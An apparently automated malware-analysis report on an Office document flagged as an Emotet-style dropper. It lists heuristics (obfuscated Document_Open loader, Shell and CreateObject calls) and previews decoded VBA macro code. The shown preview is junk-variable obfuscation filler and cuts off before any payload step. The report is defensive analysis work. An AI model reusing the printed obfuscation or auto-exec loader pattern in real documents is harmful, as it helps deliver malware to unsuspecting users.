MALICIOUS
322
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an Office document containing heavily obfuscated VBA macros. Critical heuristics indicate the presence of an auto-executing loader that uses Shell() and CreateObject() calls, typical for dropper malware. The ClamAV signature 'Doc.Dropper.Emodldr-6755244-0' further confirms its malicious nature as a dropper. The VBA code's obfuscation and use of execution functions suggest it aims to download and execute a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 200385 bytes |
SHA-256: 7291c1a37b8882672a1db7fc36f5566a67f0e39e8d48a81d3858874b38649b44 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub hVVtiN(wtgYCOe As Integer)
WSZEsctD = UCase("V%F^ml&B& gU*")
xhpkYAptvFPW = 932 + 1950 + 1983
NnEDrffBnyH = 1844 + 449 + 1641
ywHLDxqy = 1939 + 1798 + 248
FsUHBVaNHY = Right("h)sYPxHj?WA%G", 2)
pIYJgQMpYGe = 771 - 986 - 1185
WSZEsctD = Space(3)
nhXOWQuC = 1719 - 879 - 1306
vCzipFxNacux = 431 - 1311 - 1680
xhpkYAptvFPW = Space(5)
XdosBdFbyhu = LTrim("pXwpOvYszdm@nqc]")
pIYJgQMpYGe = "ez#GWL #F#wKPOCPj" + "Sny-^c%q!Z@P^qLZ" + "Q)wTaVoubqPB(C"
XdosBdFbyhu = StrReverse("R[ZDLIi-M*DtAtT-LT")
nhXOWQuC = "W*fjqqHXSvcK$REp" + "K)$R?KVrnPn?M(Ap$" + "ZPEfrotwjkm"
YQplfTwadid = "BOTm-!T_](l?#G!ZCUR" + "w(hYs@wDrTZP?RAi" + "^WStWzxVCT@dB"
ywHLDxqy = Right("Btqf*X!Jf]uFbw^v", 4)
lkbAnuwnqeV = Space(7)
pIYJgQMpYGe = RTrim(")WzGLWFCl?O#E%_)")
vfYeu = UCase("kTIIXoehWWWok^UDo_")
lkbAnuwnqeV = 994 + 1327 + 1665
WSZEsctD = "i#L_xW(.vhEmJ?fE#" + "yhS$b%iEjJQz%DhUk%J" + "vKyCG*c!kdU?Ct_LI"
NnEDrffBnyH = UCase("ty auB HowJ!")
xhpkYAptvFPW = 759 - 1403 - 923
YQplfTwadid = StrReverse("m#DGtSL.Z)_zomg")
lkbAnuwnqeV = StrReverse("JYeFYfH^trM")
NnEDrffBnyH = UCase("VsyNlh)bqFx")
xhpkYAptvFPW = Space(1)
pIYJgQMpYGe = LTrim("n((du-YMFQcC*zp")
FsUHBVaNHY = 324 + 889 + 824
hxUeXKb = "_auZFK*TEtQfmjwP" + "P$ib FDLBq%[k" + "FZNImbvJxSHmK?m.["
End Sub
Private Sub Document_Open()
hxUeXKb = Right("rT]JEpEFaARyMgX", 2)
vCzipFxNacux = Right("tDguf^ZCVi&)Va.fP [", 5)
vfYeu = 802 + 597 + 500
xhpkYAptvFPW = RTrim("hIZmPPw)[ZYI-fD")
lkbAnuwnqeV = LTrim("-wPCERhP b %ek_?X!")
vfYeu = "Cx$M@o(QGEB" + "q&JhEEUpsukaxg^iI*u" + "w TRB[UUtl"
WSZEsctD = 905 + 1886 + 1078
YQplfTwadid = 742 + 1386 + 1757
NnEDrffBnyH = Right("Pq*$Bzt!blP", 3)
GfSOiNavP = 188 + 1836 + 337
XdosBdFbyhu = Space(15)
WSZEsctD = Space(2)
For FqqqXc = 0 To 1
For sSqHvZ = 0 To 10
pIYJgQMpYGe = LTrim("Q_wjl@dC)u")
nhXOWQuC = StrReverse("Q.AL$x#[Bv_aK*Az[@^C")
ywHLDxqy = "(&uxBIdCI[twA" + "Em(leOaJnIqLWuDpUl" + "@*.x]%u[VTT"
lkbAnuwnqeV = Left(")OadH-drUjv&n ?Ivd", 5)
xhpkYAptvFPW = Right("b )MTt_sk[EmKKEWr", 2)
NnEDrffBnyH = Left("!eCmhhy^Ki N[zUEkNV", 4)
vCzipFxNacux = Left("^F?%t%zE!vX$h!?", 4)
nhXOWQuC = RTrim("YZ.RSkV^cCq[@")
xhpkYAptvFPW = ")oOiXy^& ^.gaSpNut&" + "LrAzdC#()kwa" + "@ AhXahtOl?"
Next sSqHvZ
NnEDrffBnyH = 1825 + 1115 + 1079
NnEDrffBnyH = 574 - 850 - 1485
vCzipFxNacux = Right("ZR@dGakvuy", 2)
WSZEsctD = 238 - 1738 - 1120
ywHLDxqy = RTrim("^(W%nZ#XBiQfI")
Next FqqqXc
hxUeXKb = Right("s_[#tgZtiqRQ%&eQrFS", 4)
YQplfTwadid = Right("I@De$y)vUVlHo)", 4)
XdosBdFbyhu = StrReverse("rIuwMt]% -[@t_fWgcG@")
NnEDrffBnyH = Space(16)
While rfbFTC < 1
For rfZqhS = 0 To 10
vfYeu = 193 + 659 + 1012
hxUeXKb = 125 - 1434 - 1988
vfYeu = LTrim("CVeB@buP&e")
NnEDrffBnyH = Left("jQ iNEGN(rqTYgbZtD@", 5)
XdosBdFbyhu = Right("MK)J@uuGdq?ln ", 2)
NnEDrffBnyH = Right("qWdj@?(synAj-", 3)
Next rfZqhS
GfSOiNavP = RTrim("U@Qe$IKSlbXnT]z&cg")
pIYJgQMpYGe = StrReverse("uMmejxl&wb V$R#C?GB ")
hxUeXKb = 1986 - 1071 - 830
nhXOWQuC = LTrim("IUPMf@^zxQG")
WSZEsctD = LTrim("ZnUm$yVgXRSYOB^Wzsj")
FsUHBVaNHY = LTrim(" wSF%K.KyF)at$_")
hxUeXKb = 667 + 567 + 1009
GfSOiNavP = Right("gFqJrQKV_tOAd#d$nD", 2)
rfbFTC = rfbFTC + 3
Wend
XdosBdFbyhu = Left("K&[fUar-o$Ue!o", 4)
NnEDrffBnyH = 1216 - 1451 - 351
YQplfTwadid
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.